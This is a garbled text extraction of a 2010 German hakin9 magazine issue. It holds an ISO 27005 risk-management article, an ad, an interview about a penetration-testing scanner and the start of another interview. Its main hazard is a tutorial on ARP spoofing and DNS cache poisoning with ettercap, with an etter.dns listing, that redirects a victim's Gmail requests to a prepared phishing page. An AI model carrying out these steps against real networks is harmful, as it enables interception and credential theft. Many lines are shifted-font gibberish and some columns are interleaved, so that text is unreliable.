‡ LKUHQ8UVSUXQJ1DWXU0HQVFK
‡ LKUH 0RWLYDWLRQ ¿QDQ]LHOOH *UQGH :HWWEHZHUEV-
vorteile, Rache)
‡ GLH+lX¿JNHLWGHV$XIWUHWHQV
‡ GLH *U|‰H GHV 6FKDGHQV GHU GXUFK GLHVH %HGUR-
hung verursacht werden kann.
)UHLQLJHXPZHOWEHGLQJWH%HGURKXQJHQHWZD(UGEH-
ben, Blitzschlag, ...) liegen statistische Daten vor, die
für die Einschätzung hilfreich sein können.
Die Bedrohungsanalyse umfasst im Einzelnen:
‡ GLH,GHQWL¿NDWLRQP|JOLFKHU%HGURKXQJHQ
‡ GLH(UPLWWOXQJGHU(LQWULWWVZDKUVFKHLQOLFKNHLWHQ
Bedrohungen können unterteilt werden in:
‡ +|KHUH*HZDOW%OLW]VFKODJ)HXHU(UGEHEHQ3HU-
sonalausfall)
‡ 2UJDQLVDWRULVFKH 0lQJHO IHKOHQGH RGHU XQ]XUHL-
chende Dokumentation)
‡ 0HQVFKOLFKH )HKOKDQGOXQJHQ IHKOHUKDIWH 6\VWHP-
nutzung oder -administration, Nichtbeachtung von
Sicherheitsmaßnahmen)
‡ 7HFKQLVFKHV9HUVDJHQ6RIWZDUHIHKOHUGHIHNWH'D-
tenträger)
‡ 9RUVlW]OLFKH +DQGOXQJHQ 0DQLSXODWLRQ=HUVW|UXQJ
von Geräten, Manipulation an Daten oder Software,
Viren, trojanische Pferde)
Es ist wichtig, alle wesentlichen Bedrohungen zu er-
fassen, da andernfalls Sicherheitslücken bestehen
bleiben können. Im Anhang C der Norm ist eine um-
fangreiche Listung von Bedrohungen vorhanden, je-
doch kann keine derartige Liste vollständig sein. Da-
rüber hinaus sind auch Bedrohungen einem ständigen
Wandel und einer ständigen Weiterentwicklung unter-
worfen.
Nachdem Werte und Bedrohungen erfasst wurden,
muss nun die Eintrittswahrscheinlichkeit zugeordnet
werden. Es ist also zu bestimmen, mit welcher Wahr-
scheinlichkeit eine Bedrohung im betrachteten Umfeld
eintreten wird.
Auch die Eintrittswahrscheinlichkeit kann quantita-
tiv oder qualitativ bewertet werden. Da eine quantita-
WLYH %HZHUWXQJ LQ YLHOHQ )lOOHQ HLQH *HQDXLJNHLW YRU-
täuschen könnte, ist in den letzten Jahren ein Trend in
Richtung qualitativer Bewertung zu erkennen.
33
 ABWEHR
Bewährt haben sich hier etwa drei- bis fünfteilige Ska-
len (z.B. 4: sehr häufig … 0: sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte
können für jeden einzelnen spezifischen Anwendungs-
bereich konkretisiert werden.
Nachdem Werte, Bedrohungen und Eintrittswahr-
scheinlichkeiten definiert sind, wird eine Schwachstellen-
analyse durchgeführt. Unter einer Schwachstelle (Vulne-
rability) versteht man eine Sicherheitsschwäche eines
oder mehrerer Objekte, die durch eine Bedrohung ausge-
nützt werden kann. Eine Schwachstelle selbst verursacht
noch keinen Schaden, sie ist aber die Voraussetzung,
die es einer Bedrohung ermöglicht, wirksam zu werden.
Typische Beispiele für Schwachstellen sind etwa:
Mangelnder baulicher Schutz von Räumen mit IT-Ein-
richtungen
‡ 1DFKOlVVLJH+DQGKDEXQJYRQ=XWULWWVNRQWUROOHQ
‡ VFKZDFKH3DVVZRUWPHFKDQLVPHQ
‡ XQ]XUHLFKHQGH $XVELOGXQJ PDQJHOQGHV 6LFKHU
heitsbewusstsein
‡ «
(LQH 6FKZDFKVWHOOHQDQDO\VH LVW GLH hEHUSUIXQJ YRQ
Sicherheitsschwächen und muss sowohl das Umfeld
als auch bereits vorhandene Schutzmaßnahmen mit
einbeziehen. Es ist wichtig, jede Schwachstelle da-
raufhin zu bewerten, wie leicht es ist, sie auszunutzen.
(LQH EHLVSLHOKDIWH $XÀLVWXQJ YRQ 6FKZDFKVWHOOHQ EH
Im Rahmen dieses Schrittes sollte auch geprüft wer-
den, ob die bereits existierenden Sicherheitsmaßnah-
PHQNRUUHNW]XP(LQVDW]NRPPHQ)DOVFKRGHUXQYROO
ständig eingesetzte Sicherheitsmaßnahmen stellen eine
zusätzliche potentielle Schwachstelle eines Systems dar.
Die eigentliche Risikobewertung ist nun das Zusammen-
führen der in den vorherigen Abschnitten beschriebenen
Maßnahmen und die Erstellung einer Risikomatrix (vergl.
Abb. 4). Darin werden die bewerteten Risiken gemäß ihres
Risikopotenzials in einer Matrix angeordnet und dem ge-
wünschten SOLL gegenüber gestellt. Im Anhang der Norm
befinden sich einige Beispiele für eine Risikobewertung.
Anhand der Risikomatrix erfolgt die Priorisierung der
Risiken, in Abhängigkeit des zur Verfügung stehenden
Budgets und der Ressourcen.
Risikobehandlung
Die Phase der Risikobehandlung ist das „tägliche Tun“
GHV 5LVLNRPDQDJHPHQWV ,P )DOOH GHU ,62 
bezogen auf die Informationstechnologie das Ge-
genüberstellen der Anforderungen aus der Risikobe-
wertung mit dem Ergebnis der durchgeführten Maß-
nahmen und eine neue Bewertung dieser: vergl. Abb.
5.
Die Optionen zur Risikobehandlung werden in 4 Ka-
tegorien eingeteilt:
‡ 5LVLNRUHGXNWLRQ]%GXUFK6FKXOXQJHQ(LQIKUXQJ
bestimmter Maßnahmen, etc.)
¿QGHWVLFKLP$QKDQJ'GHU1RUP ‡ 5LVLNREHLEHKDOWXQJGDV5LVLNRZLUGDN]HSWLHUW
Vor der eigentlichen Risikobewertung werden noch ‡ 5LVLNRYHUPHLGXQJ]%GXUFK(LQVWHOOHQULVLNRWUlFK
die bestehenden Sicherheitsmaßnahmen betrachtet tiger Verfahren)
und bewertet. Stellt sich heraus, dass eine bereits exis-
tierende oder geplante Maßnahme ihren Anforderun-
gen nicht gerecht wird, so ist zu prüfen, ob sie ersatz-
los entfernt, durch andere Maßnahmen ersetzt oder aus
Kostengründen belassen werden soll.
Abbildung 4. Beispielhafte Risikomatrix (Bildquelle: HMP)
34
‡ 5LVLNRYHUODJHUXQJ]%GXUFK2XWVRXUFLQJ
Risikoüberwachung und –akzeptanz
Basierend hierauf erfolgt eine neue Bewertung des
Restrisikos und der Risikomanagementprozess geht
10/2010
 IT-Risikomanagement – Wozu brauche ich das?
Abbildung 5. Ablauf Risikobehandlung (Bildquelle: CIS)
über in die Risikoüberwachung. Diesen Ablauf – auch
PDCA-Prozess genannt (Plan-Do-Check-Act) – ken-
nen Sie bereits aus dem vorherigen Artikel über die ISO
27001. Eine neue Bewertung ist ebenfalls durchzufüh-
ren, wenn sich Vorgaben ändern, neue Assets imple-
mentiert werden oder die Bedrohungssituation sich än-
dert.
Bei der Risikoakzeptanz ist es wichtig, die Entschei-
dungskriterien detailliert zu dokumentieren, damit sich
auch später noch nachvollziehbar sind.
Risikoreporting
Sinn des Risikoreportings ist zum einen die Informati-
on des Managements über den aktuellen Stand der Ri-
sikosituation und der eingeleiteten Maßnahmen, zum
anderen dient diese natürlich auch der Dokumentation.
Weitere Inhalte können z.B. sein, das Sicherheitsbe-
wusstsein zu verbessern oder das Einfordern von Ent-
scheidungen.
Die Ergebnisse von Risikobewertungen sind i.d.R.
vertraulich und dementsprechend zu handhaben.
Kapitel 4 – Nutzen und Fazit
Die Einführung eines Risikomanagementsystems
nach ISO/IEC 27005:2008 unterscheidet sich vom
Prozess her nur in Teilbereichen von der Einführung
eines kompletten Risikomanagementsystems nach
ISO/IEC 31000. Jedoch ist der Aufwand wesentlich
geringer, da es sich nur um einen Teilbereich des Un-
ternehmens handelt. Auch hier gilt wieder der Grund-
satz, dass Unternehmen, die bereits ein Qualitätsma-
nagement-System im Einsatz haben (z.B. ISO 9001),
weniger Zeit benötigen, da ihnen die Prozess-orien-
hakin9.org/de
tierte Denkweise und das strukturierte Vorgehen be-
reits vertraut sind.
Ohne Informations- und Kommunikationstechnik
kann heute kaum noch ein Unternehmen auskommen,
auch nicht zeitweise. Das gilt auch für kleinere und mitt-
lere Unternehmen genauso wie für Großunternehmen
und Konzerne. Deshalb sollte das Management wissen,
welche Risiken gerade im IT-Bereich bestehen und wie
diesen begegnet werden kann. Gerade im Bereich der
Informations- und Telekommunikationssysteme sind
die immateriellen Werte, also diejenigen Werte, denen
nicht eine Einkaufsrechnung gegenübergelegt werden
kann, häufig kaum bekannt.
Die Norm ISO/IEC 27005:2008 bietet den Vorteil,
dass mit einem kleinen Teilbereich (z.B. Netzwerk) be-
gonnen werden kann und sukzessive weitere Assets
einbezogen werden können. Zudem bietet die Norm im
Anhang Beispiele und Checklisten für das Vorgehen.
ANDREAS LENTWOJT
Der Autor ist Managementberater, CEO und Inhaber „AL-
Consult“. Nach dem Studium der Betriebswirtschaft mit den
Schwerpunkten Organisation und IT arbeitete er langjährig
bei Banken und Finanzdienstleistern als Organisations-/IT-
Leiter und später als Security-Officer. 2004 gründete er das
Beratungsunternehmen ALConsult mit den Schwerpunk-
ten Security und Prozessmanagement. Er ist zertifizierter ISO
27001-Auditor und besitzt weitere Zertifikate wie CObIT und
ITIL. Der Schwerpunkt der Beratung liegt im organisatori-
schen Bereich und den Prozessen, nicht auf der Technik.
35
)MRJEGL
WMGLIV
WYVJIR

%FWXERHWGLEJJX7MGLIVLIMX

%RKVMJJIEYJ(EXIRYRH7]WXIQI¾FIV
7GL[EGLWXIPPIRMRMRXIVRIXKIFYRHIRIR
%TTPMOEXMSRIRHVSLIRX¦KPMGL
,EPXIR7MIHMI+IJELVIRHIW-RXIVRIXWEYJ
(MWXER^ÕQMX6IQSXI'SRXVSPPIH&VS[WIV
7]WXIQW6I'S&7 HIVQTVMZEG]+QF,

QTVMZEG]+QF, &IWYGLIR7MIYRW
"N,¤MMOJTDIFO1BSL .FTTF/ŸSOCFSH
#FSMJO 0LUPCFS
'PO  )BMMF
4UBOE7PSUSBH.JI
'BY  +VEXMW^YV1IWWI8JSMBEFO4JFFJO
JOGP!NQSJWBDZEF XXXNQSJWBDZEFQSFTTFWFSBOTUBMUVOHFO
XXXNQSJWBDZEF
ECCGPSVN#FSMJO
0LUPCFS
4UBOE7PSUSBH.JI
 DNS Cache Poisoning
DNS Cache Poisoning
Patrick Schmid
Als Ergänzung zu meinem ersten Artikel Java Applet Attacke
erfahren wir hier, wie wir ein Opfer mittels DNS Spoofing
unbemerkt eine präparierte Seite unterschieben können.
IN DIESEM ARTIKEL ERFAHREN SIE...
t

XJF
FJOF
.BOJOUIF.JEEMF"UUBDLF
GVOLUJPOJFSU
t

XJF
NBO
FUUFSDBQ
LPOö
HVSJFSU
VOE
FJOTFU[U
or einiger Zeit habe darüber geschrieben,
V
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchführen
kann. Dieser Artikel lies aber offen, wie man das
Opfer auf die präparierte URL umleitet, was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist. Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann, dient dieser Ar-
tikel als Ergänzung, um diese Informationslücke zu
füllen.
Abbildung 1. Eine Anfrage (rot) an Ziel
hakin9.org/de
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...
t

(SVOEMBHFO
WPO
MJOVYCBTJFSUFO
4ZTUFNFO
t

(SVOEMBHFO
JN
#FSFJDI
/FU[XFSLBENJOJTUSBUJPO
VOE
oNBOB
gement.
Um ein Opfer auf eine präparierte Seite umzuleiten,
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Möglichkeit. Darunter
versteht man ein Angriff, wobei Einträge in einem DNS
zu eigenen Gunsten manipuliert werden.
Das Opfer merkt dabei im Idealfall nichts davon: Die-
ses tippt wie üblich zum Beispiel www.google.ch ein,
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zurückkommt, erhält das Opfer die IP-
Adresse einer präparierten Seite.
37
 ANGRIFF
Für diese Attacke werden wir das Tool ettercap ver-
wenden, da es relativ einfach aufgebaut ist, dabei aber
trotzdem viele Einstellungsmöglichkeiten bietet.
Unsere Attacke wird in zwei Stufen aufgebaut sein.
Als erstes müssen wir das Opfer oder besser dessen
Computer dazu bringen, seinen ganzen Traffic auf un-
seren Computer umzuleiten, also eine sogenannte
Man-in-the-middle-Attacke ausführen.
Dazu werden wir ARP Spoofing verwenden. ARP ist
ein Protokoll auf Layer 2 (Sicherung), um anhand einer
IP-Adresse die zugehörige MAC-Adresse abzufragen.
Die Funktionsweise von ARP Spoofing ist einfach. Der
Grund für dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch: Ein Switch führt eine Zuordnungstabelle, worin die
MAC-Adressen der angeschlossenen Geräte dem jeweili-
gem Port zugeordnet sind. Diese gibt es deshalb, weil ein
Switch somit genau weiss, welches System an welchem
Port angeschlossen ist und somit auch, an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss.
Der Client führt einen eigenen ARP-Cache, worin er
eine MAC-Adresse einer IP-Adresse zuordnet, sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss.
Veranschaulicht könnte das dann so ablaufen (Bild 1):
‡ 'HU &OLHQW IUDJW EHLP (UVWHOOHQ HLQHV 3DNHWHV VHL
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket.
‡ 'HU 6ZLWFK OLHVW GLH 0$&$GUHVVH DXV GHP 3DNHW
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehört, wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet.
%HL $53 6SRR¿QJ NDQQ GHU $QJUHLIHU GHQ $53&DFKH
seines Opfers so verändern, dass eine IP-Adresse einer
total neuen, beliebigen MAC-Adresse zugeordnet wird.
Abbildung 2. Eine Anfrage (rot) an Ziel während ARP-Spoofing
38
Wieder ein Beispiel dazu (Bild 2):
‡ 'HU $QJUHLIHU YHUlQGHUW GHQ $53&DFKH GHV 2S
IHUVPLWWHOV$536SRR¿QJVRGDVV]XU,3GHV=LH
les nicht mehr die MAC-Adresse des Zieles, son-
dern die des Angreifers zugeordnet ist.
‡ 'HU &OLHQW IUDJW QXQ ZLHGHU EHLP (UVWHOOHQ HLQHV
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab. Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten, bekommt er die des Angreifers, welche er in to-
taler Unwissenheit in sein Paket packt.
‡ 'HU 6ZLWFK OLHVW QXQ GLH 0$&$GUHVVH DXV GHP
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle. Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel.
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer.
Damit das Oper davon aber nichts merkt, muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leiten.Nun verläuft die Kommunikation schon vom Op-
fer über den Angreifer zum Ziel.
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen, also Anfragen und Antworten mitkriegt,
macht man ARP-Attacken immer auf den Client und den
Router / Gateway gleichzeitig, womit nun eine Kommuni-
kation vom Opfer über den Angreifer zum Ziel und auch
wieder zurück möglich ist. Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage, den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhören, sondern auch beliebig zu ver-
ändern, was uns auch sogleich zu Schritt 2 bringt.
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und präpariert. Also wollen wir auch gleich dort
anknüpfen.
10/2010
 DNS Cache Poisoning
Nun gilt es für den Angreifer darauf zu warten, bis das
Opfer den A-Record von gmail.com abfragt. Sehen wir
nun in unserem mitgehörten Traffic eine solche Anfra-
ge, so muss das Antwortpaket soweit verändert werden,
dass anstatt die tatsächliche IP-Adresse nun die IP-Ad-
resse zu unserer präparierten Seite übermittelt wird.
Das Opfer selbst empfängt und akzeptiert das so,
weil es selbst von der Veränderung nichts mitbekommt.
Alle Anfragen, welche das Opfer von nun an an Gmail
macht, werden nicht an Gmail selbst, sondern an un-
sere präparierte Seite gesandt, womit unser Vorhaben
erfüllt wäre.
So nun genug Theorie, schreiten wir zur Tat!
Beide Schritte können direkt mit ettercap durchge-
führt werden.
Dabei handelt es sich um ein Stück Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken, welches
unter der GPL wahlweise für Windows, Linux oder Mac
veröffentlicht wurde.
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt, was sich jedoch nicht auf die Funktionalität
auswirkt.
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden, doch erstmal wird alles konfiguriert.
Zuerst müssen wir unsere eigenen A-Rekords für
gmail.com anlegen. Dazu editieren wir die Datei /usr/
share/ettercap/etter.dns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt.
Wenn wir nun speichern, so haben wir festgelegt,
dass Anfragen nach der IP von gmail.com oder *.gmail.
com mit 127.0.0.1 beantwortet werden sollen.
Listing 1. ein A-Record für eine präparierte Seite von
gmail.com
*.gmail.com A 127.0.0.1
gmail.com A 127.0.0.1
Abbildung 3. GTK-GUI von ettercap
hakin9.org/de
Somit sind wir auch schon bereit und können bereits
mit Schritt 1 beginnen.
Dazu starten wir ettercap und wählen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus. Dabei
werden wir nach dem Interface gefragt, über welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist. Im Falle einer Verbindung via Kabel ist das meist
eth0, bei WLAN meist wlan0.
Ist auch das vollbracht, so können das oder die Ziele
identifiziert werden. Dazu wählen wir den Punkt Hosts >
Scan for hosts, wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3).
Ist auch das durchgestanden, so können die Ziele un-
ter Hosts > Hosts list ausgewählt werden. Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewählt werden. Hier muss gegebenenfalls
mit nmap nach geprüft werden um die IP des Opfers zu
identifizieren.
Nun kann mit dem Selektieren von Mitm > Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden.
Wird nun Wireshark oder tcpdump gestartet, so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters / Gateways mitgehört werden.
Nun gleich weiter zu Schritt 2. Nachdem die Man-in-
the-Middle-Attacke steht, können wir dem Opfer nun
unsere DNS-Records aufzwingen.
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins > Manage the plugins. Da wählen wir den
Punkt dns_spof aus.
Und somit ist unser DNS-Spoofing-Angriff einsatzfä-
hig und aktiv.
Wem als Angreifer kein GUI zur Verfügung steht, der
kann auch den interaktiven Modus von ettercap ver-
wenden. Dazu muss ettercap nur mit der Option -T auf-
gerufen werden. Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen.
Nun ist alles getan! Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft, wird es auf unsere
präparierte Seite umgeleitet, ohne dass es davon etwas
merkt.
In Kombination mit SET erhält ein Angreifer so mühe-
los Zugriff auf ein fremdes System.
Links
t

http://seicon.ch Unternehmen des Autors
t

http://blog.encodingit.ch
#MPH
EFT
"VUPST
PATRICK SCHMID
Der Autor ist System Engineer im Bereich Linux / Unix und
unterstützt nebenbei die Entwicklung und Verbreitung von Li-
nux und Opensource im privaten wie auch im professionellen
Umfeld.
39
 Interview mit Tobias Glemser
„Sicherheit darf nicht erst am Ende von neuen
Anwendungen, Produkten oder Projekten als
Kontrollinstrument einbezogen, sondern muss
als integraler und vor Allem unterstützender
Bestandteil eines erfolgreichen Produkts
gesehen werden.“
Interview mit Tobias Glemser
hakin9: Erzählen Sie uns bitte ein wenig über sich
selbst: wer sind Sie, was machen Sie und wie ist es
dazu gekommen, dass Sie sich mit IT-Sicherheit
Branche beschäftigen?
Tobias Glemser: Mein Name ist Tobias Glemser, ich
bin leitender IT-Sicherheitsberater bei der Tele-Consul-
ting security networking training GmbH in Gäufelden bei
Stuttgart und verantwortlich für den Geschäftsbereich
Penetrationstests. Zu Schul- und Zivildienstzeiten hatte
ich bereits den ersten Kontakt mit technischen Audits
und habe schlicht das Hobby zum Beruf gemacht. Seit
über zehn Jahren bin ich in entsprechenden Projekten
tätig. Am Wichtigsten ist der kreative Umgang mit Sys-
temen und Anwendungen. Funktionen, die ein Entwick-
ler nach besten Wissen und Gewissen implementiert
hat so zu nutzen, dass sie nicht mehr dem ursprüngli-
chen Zweck dienen. Im Projektumfeld erhält man viele
Einblicke in Techniken und Prozesse in unterschiedli-
chen Firmen und Behörden, z. B. Energie, Flugraum-
überwachung, Banken. Neben den technischen Aspek-
ten ist es mein und unser Ziel mit allen Beteiligten des
Kunden ein gemeinsames Ziel zu erreichen. So wäre es
aus meiner Sicht unsinnig, technische Schwachstellen
mit rein technischen Hilfestellungen zu beheben. Der
Ansatz springt deutlich zu kurz. Vielmehr geht es auch
darum, auf Prozesse abzuleiten und diese zu verbes-
sern. Diese Nachhaltigkeit und die positiven Rückmel-
dungen treiben an. Darüber hinaus bin ich frei in der
Beratung, d. h. wir haben keine Produkte im Portfolio,
die bei einem technischen Audit möglichst gleich mit an-
gepriesen werden müssen.
hakin9: Bereits bei mehreren tausend Tests
von Netzen und Systemen haben Sie den
selbstentwickelten Security Scanner tajanas genutzt.
Was unterscheidet tajanas von anderen solchen
Werkzeugen?
Tobias Glemser: Wir haben tajanas zunächst für ei-
gene Zwecke entwickelt und setzten es auch heute als
Basis in Penetrationstests ein. tajanas ist ein Frame-
hakin9.org/de
work und Webfrontend für die grundsätzliche Prüfung
eines Systems mit automatisierten Port- und Vulnera-
bility-Scans und einheitlichem Reporting pro System.
Wir haben dabei das Ziel verfolgt, nicht das Rad neu
zu erfinden, sondern etablierte Programme für die ei-
gentlichen Prüfungen zu nutzen. Die Ergebnisse der
einzelnen Schritte werden analog zu einer manuellen
Prüfung mit den jeweiligen Programmen automatisiert
verknüpft. Dies ermöglicht eine wesentliche schnellere
Durchführung bei gleicher Ergebnis-Qualität. Darüber
hinaus ist die Oberfläche so gehalten, dass nur die not-
wendigsten Optionen zur Verfügung stehen.
Neben der Schwachstellen-Prüfung ist auch eine
Erreichbarkeitsprüfung integriert, um einen schnellen
Überblick über aktive Systeme in Netzen zu erhalten.
Es ist wichtig zu verstehen, dass Penetrationstests
ohne automatisierte Tests nicht funktionieren. Die schie-
re Anzahl an Schwachstellen lässt sich nur sinnvoll mit
entsprechenden Programmen prüfen. Die Ergebnisse
sind dann die Basis für weitere, manuelle Tests. Dabei
wird mit Know-How und Kreativität versucht, weitere
Lücken zu finden, um und diese dann auszunutzen.
hakin9: Wie erfolgt die Bedienung des Scanners, und
welche Lizenzen und Module existieren?
Tobias Glemser: Die Bedienung erfolgt vollständig
über eine webbasierte Oberfläche. tajanas wird als VM-
ware- oder Hardware-Appliance ausgeliefert, der End-
benutzer kann alle Funktionen – dazu gehören auch Ak-
tualisierungen – über die Weboberfläche nutzen, Jeder
Nutzer erhält natürlich trotzdem vollständigen Root-Zu-
griff auf das System. Die Lizenzierung erfolgt pro In-
stallation, eine Limitierung auf IP-Adressen oder eine
gewisse Anzahl Scans erfolgt nicht. Neben dem Audit-
Modul, gibt es auch ein Modul für die Erreichbarkeits-
prüfung.
hakin9: Woher kommt der Name tajanas?
Tobias Glemser: tajanas steht für „this ain’t just ano-
ther network scanner” – weil es ein wie beschrieben ein
41
 INTERVIEW
Framework darstellt und nicht den n-ten Port- oder Vul-
nerability-Scanner. Wenn wir Bugs in den verwendeten
Programmen feststellen oder Ideen für Erweiterungen
haben, geben wir diese direkt in die Community zurück.
hakin9: Wer sind Benutzer von tajanas?
Tobias Glemser: Zum einen natürlich wir selbst. Zum
anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-
soren das Tool für regelmäßige Sicherheitsprüfungen
ihrer Netze ein.
hakin9: Für welche Fälle reichen Penetrationstests
nicht aus?
Tobias Glemser: Das hängt von der Zieldefinition des
Kunden ab, und was man unter einem Penetrationstest
versteht. Bei Tele-Consulting sind alle Mitarbeiter nicht
nur in technische Audits wie Penetrationstests eingebun-
den, sondern auch in prozessorientierte Beratungen und
Audits wie z. B. ISO 27001 oder BSI IT-Grundschutz.
Dies ermöglicht es uns, in technischen Audits nicht nur
die technischen Lücken aufzuzeigen, sondern auch auf
fehlende oder mangelhafte Prozesse hinzuweisen und
konkrete Vorschläge zur Verbesserung zu geben.
hakin9: Können Sie uns ein konkretes Beispiel
nennen?
Tobias Glemser: Nehmen wir an, dass aus Wirtschaft-
lichkeitsgründen nicht alle Server in einem Netz in ein
technisches Audit einbezogen werden, sondern nur eine
definierte Anzahl. Stellt man hier Schwachstellen fest,
so genügt es nicht, die erkannten Schwachstellen oder
gar Lücken zu schließen, sondern man muss sich fra-
gen, wie es zu den Schwachstellen kommen konnte. In
den seltensten Fällen haben hier Administratoren indi-
viduelle Fehler gemacht, vielmehr scheinen offensicht-
lich die Vorgaben zur Serverkonfiguration bzw. Härtung
nicht ausreichend zu sein bzw. diese in ein Information
Security Management System (ISMS) integriert zu sein.
Darauf weisen wir nachdrücklich in unseren Ergebnis-
berichten hin, um eine Gesamtverbesserung zu erzie-
len und unterstützen bei Bedarf auch bei der Umset-
zung der organisatorischen Anteile.
Geht man diesen Schritt nicht, werden erfahrungs-
gemäß nur die Systeme verändert, bei denen im Test
Schwachstellen erkannt wurden. Der Verbesserung der
Gesamtsicherheit hilft dies dann allerdings nicht.
hakin9: Wie sieht eine Sicherheitsüberprüfung
mithilfe des Penetrationstests aus?
Tobias Glemser: Zunächst bedarf es einer klaren Ziel-
vorstellung. Entweder haben Kunden diese bereits,
oder sie wird im Rahmen eines Workshops gemeinsam
erarbeitet. Dabei ist es meist sinnvoll mehrstufig vorzu-
gehen und die Themen in verschiedenen Arbeitspake-
ten abzuarbeiten. Im Rahmen eines Kick-Offs werden
die Beteiligten informiert und in den Ablauf integriert.
42
Nach der Durchführung erhält der Kunde einem umfas-
senden, auf seine Umgebung und Realität angepass-
ten Ergebnisbericht, der im Rahmen eines Abschluss-
Workshops mit den technischen verantwortlichen
besprochen wird. Auf Wunsch erfolgt auch die Darstel-
lung vor dem Vorstand bzw. der Leitungsebene.
Das Spektrum eines Penetrationstests ist sehr viel-
fältig und lässt sich nur schwer darstellen. Es handelt
sich dabei jedoch nicht zwingend um die „bekannten“
Prüfungen auf Serversysteme. Häufige Einfallstore für
Angreifer sind schlecht gesicherte lokale Netzwerke,
Client-Systeme oder auch Multifunktionsdrucker. Bei
Interesse finden sich Informationen z. B. in der Studie
Penetrationstests des BSI, dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-
per Projektierung der Sicherheitsprüfung von Weban-
wendungen der OWASP.
hakin9: Welche Pläne die IT-Sicherheit Branche
betreffend haben Sie noch vor?
Tobias Glemser: Abseits von technischen Audits ver-
suchen wir ganzheitliche Prozesse vor allem, aber nicht
nur in den IT-Abteilungen zu etablieren und dabei Ad-
ministratoren die Hilfestellungen zu geben, die sie da-
bei benötigen. Als Sicherheitsberater oder auch Sicher-
heitsbeauftrager eines Unternehmens nimmt man meist
die Rolle eines Kontrolleurs ein, der darauf achtet, dass
Regeln eingehalten werden. Hier ist ein Wandel erfor-
derlich, sowohl bei denen, die sich „Sicherheit“ auf die
Fahnen schreiben, als auch bei den Administratoren
und Verantwortlichen für Geschäftsbereiche und deren
Technik. Sicherheit darf nicht erst am Ende von neuen
Anwendungen, Produkten oder Projekten als Kontrollin-
strument einbezogen, sondern muss als integraler und
vor Allem unterstützender Bestandteil eines erfolgrei-
chen Produkts gesehen werden. Hier müssen auch und
vor allem Sicherheitsberater umdenken, um vorrangig
als Unterstützer, die sie sind, gesehen und akzeptiert
zu werden. Nur so begreifen die technisch verantwort-
lichen Mitarbeiter Sicherheitsprüfungen nicht als Prü-
fungen ihrer persönlichen Kompetenz, sondern als kon-
krete Unterstützung für die Verbesserung vorhandener
Sicherheitsprozesse.
Im Bereich der technischen Schwachstellen werden
weiterhin Webanwendungen eine große Rolle spielen.
Daher bin ich seit geraumer Zeit beim Open Web Appli-
cation Security Project (OWASP), den meisten vermut-
lich durch die OWASP Top 10 bekannt, ehrenamtlich
tätig und seit diesem Jahr im Board der deutschen Sek-
tion. Beim OWASP Stammtisch Stuttgart (und Stamm-
tischen in anderen Städten) tauschen sich hier auch
Menschen rund um das Thema zwanglos aus. Wer
Lust hat vorbeizukommen, kann sich auf der deutschen
OWASP Webseite informieren.
Wir bedanken uns für das Gespräch!
10/2010
 INTERVIEW

„Erfolgreiche Frauen
in der IT-Branche - ein
Erfahrungsbericht“
Interview mit Ulrike Peter

hakin9: Lassen Sie uns bitte ein wenig über sich selbst Aber wie heißt es so schön: „Ausnahmen bestätigen
wissen: wer sind Sie, was machen Sie und wie ist es die Regel“. Und der Trend zeigt beispielsweise, dass
dazu gekommen, dass Sie in der IT-Branche tätig sind? Frauen zunehmend technische Studiengänge bele-
Ulrike Peter: Ich bin PR-Spezialistin und Journalis- gen.
tin durch und durch. Die Liebe zum Schreiben ent-
deckte ich früh. Nach ersten Gehversuchen als freie hakin9: Heutzutage sind wir überall von Computern
Mitarbeiterin bei einer Tageszeitung absolvierte ich umgeben. In der IT-Branche herrscht trotzdem ein
vor zehn Jahren ein Volontariat in einer PR-Agentur Frauenmangel. Woran liegt dies Ihrer Meinung nach?
mit parallelem Fernstudium „Journalismus“. Die ers- Ulrike Peter: Noch lockt es wesentlich mehr Männer in
ten Tage in der Agentur waren wie ein Kopfsprung technische Berufe als Frauen. Ich denke, das Verhältnis
ins kalte Wasser. Denn obwohl ich das journalistische wird auch in Zukunft so bleiben – auch wenn sich die
Rüstzeug besaß, wusste ich anfangs nicht mal, wo klassische Rollenverteilung verschiebt und die „Gren-
sich die Escape-Taste an meinem PC befand, hatte
